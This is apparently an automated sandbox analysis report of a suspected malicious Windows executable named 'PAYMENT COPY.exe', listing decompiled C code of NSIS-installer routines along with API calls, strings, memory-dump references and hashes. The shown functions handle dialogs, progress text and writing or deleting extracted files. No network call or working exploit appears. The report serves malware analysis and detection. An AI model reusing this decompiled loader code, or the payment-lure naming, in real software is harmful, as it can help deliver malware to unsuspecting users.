					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                    0x0040652a
                                                                    0x00406532
                                                                    0x00406546
                                                                    0x00406546
                                                                    0x0040654c
                                                                    0x00406559
                                                                    0x00406559
                                                                    0x0040655a
                                                                    0x0040655c
                                                                    0x00406560
                                                                    0x00406562
                                                                    0x0040656b
                                                                    0x0040656d
                                                                    0x00406587
                                                                    0x0040658f
                                                                    0x0040658f
                                                                    0x00406594
                                                                    0x00406596
                                                                    0x00406598
                                                                    0x0040659c
                                                                    0x0040659d
                                                                    0x004065a0
                                                                    0x004065a8
                                                                    0x004065aa
                                                                    0x004065ae
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004065b4
                                                                    0x004065b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004065b9
                                                                    0x004065be

                                                                    APIs
                                                                    • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                    • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                    • CharNextA.USER32(?,"C:\Users\user\Desktop\PAYMENT COPY.exe" ,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                    • CharPrevA.USER32(?,?,76D7FA90,C:\Users\user~1\AppData\Local\Temp\,00000000,00403461,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                    Strings
                                                                    • *?|<>/":, xrefs: 00406570
                                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406529
                                                                    • "C:\Users\user\Desktop\PAYMENT COPY.exe" , xrefs: 00406564
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: "C:\Users\user\Desktop\PAYMENT COPY.exe" $*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                                    • API String ID: 589700163-3363945112
                                                                    • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                    • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                                    • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                    • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                    0x0040434a
                                                                    0x00404400
                                                                    0x00000000
                                                                    0x00404400
                                                                    0x0040435b
                                                                    0x0040435f
                                                                    0x00000000
                                                                    0x00404379
                                                                    0x00404379
                                                                    0x00404382
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404384
                                                                    0x00404390
                                                                    0x00404393
                                                                    0x00404393
                                                                    0x00404399
                                                                    0x0040439f
                                                                    0x0040439f
                                                                    0x004043ab
                                                                    0x004043b1
                                                                    0x004043b8
                                                                    0x004043bb
                                                                    0x004043be
                                                                    0x004043c0
                                                                    0x004043c0
                                                                    0x004043c8
                                                                    0x004043ce
                                                                    0x004043ce
                                                                    0x004043d8
                                                                    0x004043dd
                                                                    0x004043e0
                                                                    0x004043e5
                                                                    0x004043e8
                                                                    0x004043e8
                                                                    0x004043f8
                                                                    0x004043f8
                                                                    0x00000000
                                                                    0x004043fb

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                    • Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
                                                                    • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                    • Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405374, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405374(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f514;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
					}
					_t26 = lstrlenA(0x42a098);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a098;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a098)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a098, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                    0x0040537a
                                                                    0x00405386
                                                                    0x00405389
                                                                    0x0040538f
                                                                    0x0040539b
                                                                    0x0040539e
                                                                    0x004053a1
                                                                    0x004053a7
                                                                    0x004053a7
                                                                    0x004053ad
                                                                    0x004053b5
                                                                    0x004053b8
                                                                    0x004053d5
                                                                    0x004053d9
                                                                    0x004053e2
                                                                    0x004053e2
                                                                    0x004053ec
                                                                    0x004053f5
                                                                    0x00405401
                                                                    0x00405408
                                                                    0x0040540c
                                                                    0x0040540f
                                                                    0x00405422
                                                                    0x00405430
                                                                    0x00405430
                                                                    0x00405434
                                                                    0x00405436
                                                                    0x00405439
                                                                    0x00000000
                                                                    0x00405439
                                                                    0x004053ba
                                                                    0x004053c2
                                                                    0x004053ca
                                                                    0x004053d0
                                                                    0x00000000
                                                                    0x004053d0
                                                                    0x004053ca
                                                                    0x004053b8
                                                                    0x00405443

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                    • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                    • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                    • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                    • SendMessageA.USER32 ref: 00405408
                                                                    • SendMessageA.USER32 ref: 00405422
                                                                    • SendMessageA.USER32 ref: 00405430
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                    • String ID:
                                                                    • API String ID: 2531174081-0
                                                                    • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                    • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                                    • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                    • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42946c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42946c = 0;
					return _t15;
				}
				if( *0x42946c != 0) {
					return E00406692(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42f450) {
					if( *0x42f448 == 0) {
						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
						 *0x42946c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42f514 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E00405374(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                    0x00402e5e
                                                                    0x00402e60
                                                                    0x00402e67
                                                                    0x00402e6a
                                                                    0x00402e6a
                                                                    0x00402e70
                                                                    0x00000000
                                                                    0x00402e70
                                                                    0x00402e7e
                                                                    0x00000000
                                                                    0x00402e81
                                                                    0x00402e88
                                                                    0x00402e94
                                                                    0x00402e9c
                                                                    0x00402eda
                                                                    0x00402ee3
                                                                    0x00000000
                                                                    0x00402ee8
                                                                    0x00402ea5
                                                                    0x00402eb6
                                                                    0x00000000
                                                                    0x00402ec4
                                                                    0x00402ea5
                                                                    0x00402ef0

                                                                    APIs
                                                                    • DestroyWindow.USER32(?,00000000), ref: 00402E6A
                                                                    • GetTickCount.KERNEL32 ref: 00402E88
                                                                    • wsprintfA.USER32 ref: 00402EB6
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                      • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                      • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                      • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
                                                                      • Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430
                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                      • Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                    • String ID: ... %d%%
                                                                    • API String ID: 722711167-2449383134
                                                                    • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                    • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                                    • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                    • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404C24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                    0x00404c32
                                                                    0x00404c3f
                                                                    0x00404c45
                                                                    0x00404c83
                                                                    0x00404c83
                                                                    0x00404c92
                                                                    0x00404c99
                                                                    0x00000000
                                                                    0x00404c9b
                                                                    0x00404c47
                                                                    0x00404c56
                                                                    0x00404c5e
                                                                    0x00404c61
                                                                    0x00404c73
                                                                    0x00404c79
                                                                    0x00404c80
                                                                    0x00000000
                                                                    0x00404c80
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Message$Send$ClientScreen
                                                                    • String ID: f
                                                                    • API String ID: 41195575-1993550816
                                                                    • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                    • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                                    • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                    • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x42f454 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                    0x00402dc7
                                                                    0x00402dd5
                                                                    0x00402ddb
                                                                    0x00402ddb
                                                                    0x00402de9
                                                                    0x00402deb
                                                                    0x00402df7
                                                                    0x00402dfc
                                                                    0x00402dfe
                                                                    0x00402dfe
                                                                    0x00402e09
                                                                    0x00402e19
                                                                    0x00402e2b
                                                                    0x00402e2b
                                                                    0x00402e33

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                    • API String ID: 1451636040-1158693248
                                                                    • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                    • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                                    • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                    • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C52(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405DC1(_t50);
				_t26 = E00405DE6(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f458;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040343E(_t45);
						E00403428(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                    0x004027df
                                                                    0x004027e1
                                                                    0x004027ed
                                                                    0x004027f0
                                                                    0x004027fa
                                                                    0x004027fe
                                                                    0x004027fe
                                                                    0x00402804
                                                                    0x00402811
                                                                    0x00402819
                                                                    0x0040281c
                                                                    0x00402822
                                                                    0x00402830
                                                                    0x00402835
                                                                    0x00402839
                                                                    0x0040283c
                                                                    0x00402845
                                                                    0x00402851
                                                                    0x00402855
                                                                    0x00402858
                                                                    0x00402862
                                                                    0x00402887
                                                                    0x00402869
                                                                    0x0040286e
                                                                    0x00402876
                                                                    0x0040287c
                                                                    0x00402881
                                                                    0x00402881
                                                                    0x0040288e
                                                                    0x0040288e
                                                                    0x0040289b
                                                                    0x004028a1
                                                                    0x004028b3
                                                                    0x004028b3
                                                                    0x004028b9
                                                                    0x004028b9
                                                                    0x004028c4
                                                                    0x004028c5
                                                                    0x004028c9
                                                                    0x004028cd
                                                                    0x004028d3
                                                                    0x004028d3
                                                                    0x004028da
                                                                    0x004022dd
                                                                    0x00402a5d
                                                                    0x00402a69

                                                                    APIs
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                    • GlobalFree.KERNEL32 ref: 0040288E
                                                                    • GlobalFree.KERNEL32 ref: 004028A1
                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                    • String ID:
                                                                    • API String ID: 2667972263-0
                                                                    • Opcode ID: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                    • Instruction ID: 6e19ad8f311a8fe4d121ff6d49c8506e1ed5368105aa9b5939d25a16afe37da6
                                                                    • Opcode Fuzzy Hash: 10aa94e9192e65a0b09259698f99f40e5440345eda598c6609a5c103b0ccd052
                                                                    • Instruction Fuzzy Hash: C0219F72800124BBDF217FA5CE48D9E7E79EF09324F14823EF450762D1CA7949418FA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 73581837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 97%
                                                                    			E73581837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7358405c = _a8;
				_t77 = 0;
				 *0x73584060 = _a16;
				_v12 = 0;
				_v8 = E7358123B();
				_t90 = E735812FE(_t42);
				_t87 = _t85;
				_t81 = E7358123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E7358123B();
					_t77 = E735812FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73581429(_t85, _t90, _t87,  &_v52);
								E73581266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73582EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
